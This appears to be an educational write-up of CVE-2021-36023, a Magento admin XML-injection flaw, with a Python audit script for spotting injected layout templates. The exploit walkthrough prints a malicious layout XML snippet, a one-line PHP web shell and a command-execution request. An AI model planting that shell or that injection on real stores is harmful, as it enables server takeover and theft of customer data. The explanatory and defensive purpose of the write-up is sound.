CVE-2021-36023 is an _XML Injection_ flaw in the Widgets "Update Layout" functionality within the Magento admin backend. An attacker with administrator permissions can abuse this functionality to inject malicious XML—ultimately resulting in remote code execution (RCE) on the server.
CVE Details at NVD:
https://nvd.nist.gov/vuln/detail/CVE-2021-36023
Adobe Security Bulletin:
https://helpx.adobe.com/security/products/magento/apsb21-50.html
3. How the Vulnerability Works
Magento uses XML files to define the structure and layout of pages. In the admin, a widget's layout can be updated by submitting XML to the server. Magento did not fully sanitize or validate this XML before merging it into the page layout, so crafted XML lets an attacker control which block classes and templates get rendered, up to having system commands run through a template of their choosing.
The Dangerous Point
This vulnerability is rooted in how Magento merges and parses admin-supplied XML. Improper handling of user input here means arbitrary XML can reach sensitive code, like block class instantiation or even direct PHP code execution through crafted layouts.
4. Exploit Walkthrough
Let’s go step-by-step to see how an attacker might achieve Remote Code Execution using this flaw.
Step A: Crafting Malicious Layout XML
Consider the following XML snippet, which an attacker might use in the "Widget Update Layout" field while editing or creating a new widget in the Magento backend:
```xml
<layout>
    <update handle="CUSTOM_HANDLE"/>
    <referenceContainer name="page.top">
        <block class="Magento\Framework\View\Element\Template" template="Magento_Theme::html/evil.phtml"/>
    </referenceContainer>
</layout>
```
Now, if the attacker is able to upload or create evil.phtml under the relevant Magento directory, the injected layout XML references that file and Magento renders it as part of the normal page rendering process, executing whatever PHP it contains.
If user-supplied parameters allow, it is even possible to use more advanced Magento classes to fetch remote files, execute PHP code directly, or chain additional vulnerabilities.
If evil.phtml contains:
```php
<?php system($_GET['cmd']); ?>
```
and is placed in a path Magento resolves for templates, the following request executes the supplied command:
https://mystore.com/?cmd=whoami
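The following is an added Python example for sections 3 and 4, not Magento's own code: it shows the kind of validation the vulnerable layout merge lacked, applied as an after-the-fact audit of stored widget layout updates. Each update is parsed, every `<block template="...">` is checked for the `Vendor_Module::path.phtml` form and against the set of templates that actually ship with the installed code, and every `<action method="...">` call is reported along with any template-looking argument it passes. The `SAMPLE_UPDATES` rows (row 2 mirrors the injected layout above), the `KNOWN_TEMPLATES` set and the function names are constructed assumptions; in a real deployment the rows would be exported from the database and the template set built by walking `app/code` and `vendor/`.

```python
"""Audit Magento widget layout updates for injected block templates.

Added example, not Magento's own code. It assumes stored layout-update XML is
available as (id, xml) pairs (constructed here; in practice exported from the
database) and that the set of .phtml templates shipped by installed modules is
known (constructed here; in practice built by walking app/code and vendor/).
"""
import re
import xml.etree.ElementTree as ET

# A well-formed Magento template reference: Vendor_Module::relative/path.phtml
TEMPLATE_RE = re.compile(
    r"^[A-Za-z][A-Za-z0-9]*_[A-Za-z][A-Za-z0-9]*::[A-Za-z0-9_./-]+\.phtml$"
)

# Constructed: templates that really exist in the installed code base.
KNOWN_TEMPLATES = {
    "Magento_Cms::widget/static_block/default.phtml",
    "Magento_Catalog::product/widget/new/content/new_grid.phtml",
}

# Constructed: stored layout updates as (update_id, xml) pairs. Row 2 mirrors
# the injected layout shown in the walkthrough above.
SAMPLE_UPDATES = [
    (1, r"""<layout><referenceContainer name="content">
        <block class="Magento\Cms\Block\Widget\Block"
               template="Magento_Cms::widget/static_block/default.phtml"/>
        </referenceContainer></layout>"""),
    (2, r"""<layout><update handle="CUSTOM_HANDLE"/><referenceContainer name="page.top">
        <block class="Magento\Framework\View\Element\Template"
               template="Magento_Theme::html/evil.phtml"/>
        </referenceContainer></layout>"""),
    (3, r"""<layout xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
        <referenceBlock name="footer"><action method="setTemplate">
        <argument name="template" xsi:type="string">Magento_Theme::html/evil.phtml</argument>
        </action></referenceBlock></layout>"""),
    (4, "<layout><block template='../../../pub/media/x.phtml'/></layout>"),
    (5, "<layout><block"),  # truncated / unparseable row
]


def audit_layout_xml(update_id, xml_text, known_templates=KNOWN_TEMPLATES):
    """Return a list of (update_id, category, detail) findings for one update."""
    findings = []
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        # Unparseable XML in a stored update is itself worth a look.
        return [(update_id, "unparseable", str(exc))]

    def check_template(ref):
        if not TEMPLATE_RE.match(ref):
            findings.append((update_id, "malformed-template", ref))
        elif ref not in known_templates:
            findings.append((update_id, "unknown-template", ref))

    # Every <block template="..."> must point at a template that ships with
    # the installed code; anything else is a candidate for an uploaded file.
    for block in root.iter("block"):
        template = block.get("template")
        if template is not None:
            check_template(template)

    # <action method="..."> calls arbitrary methods on existing blocks; admin
    # widget layouts rarely need this, so report each call and inspect any
    # template-looking argument it passes.
    for action in root.iter("action"):
        findings.append((update_id, "action-call", action.get("method", "?")))
        for arg in action.iter("argument"):
            text = (arg.text or "").strip()
            if text.endswith(".phtml"):
                check_template(text)
    return findings


def audit_updates(updates, known_templates=KNOWN_TEMPLATES):
    """Audit every stored update and return all findings in row order."""
    findings = []
    for update_id, xml_text in updates:
        findings.extend(audit_layout_xml(update_id, xml_text, known_templates))
    return findings


if __name__ == "__main__":
    for update_id, category, detail in audit_updates(SAMPLE_UPDATES):
        print(f"update {update_id}: {category}: {detail}")
```

Run stand-alone, the script reports row 2 for a template that no installed module ships, row 3 for an `<action>` call that also points at that template, row 4 for a path that is not a module-qualified template at all, and row 5 as unparseable; row 1 is clean. The same allowlist check, applied before an admin-supplied layout update is saved, is the shape of the validation the vulnerability was missing, and pairing the audit with a scan for `.phtml` files that appeared on disk outside a deployment covers the uploaded-file half of the attack.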
5. What Makes this Attack Dangerous?
- Privilege Level: Admins, while trusted, are often compromised through phishing, shared passwords, or stolen sessions.
- Persistence: Malicious code can persist long-term, even after logs are wiped.
- Typical Impact: Site defacement, theft of customer data, credit card skimming (Magecart), or full server takeover.
7. References
- Adobe Magento Security Updates
- Magento Official Release Notes
- NIST National Vulnerability Database
- Exploit-DB (proof of concept discussions)
8. Final Thoughts
CVE-2021-36023 highlights the dangers of handling user-supplied XML—even in admin-only areas. If you are running an affected version of Magento, patch immediately and audit your admin panel users regularly. Even admins can be vector points for major breaches, especially in the e-commerce world, where credit card info and personal data are at constant risk.
Stay secure, keep Magento updated, and never trust user input—no matter where it comes from!
Disclaimer:
This article is for educational purposes only. Never attempt to exploit vulnerabilities without explicit permission. Always patch your systems and practice responsible disclosure.
Timeline
Published on: 09/06/2023 14:15:00 UTC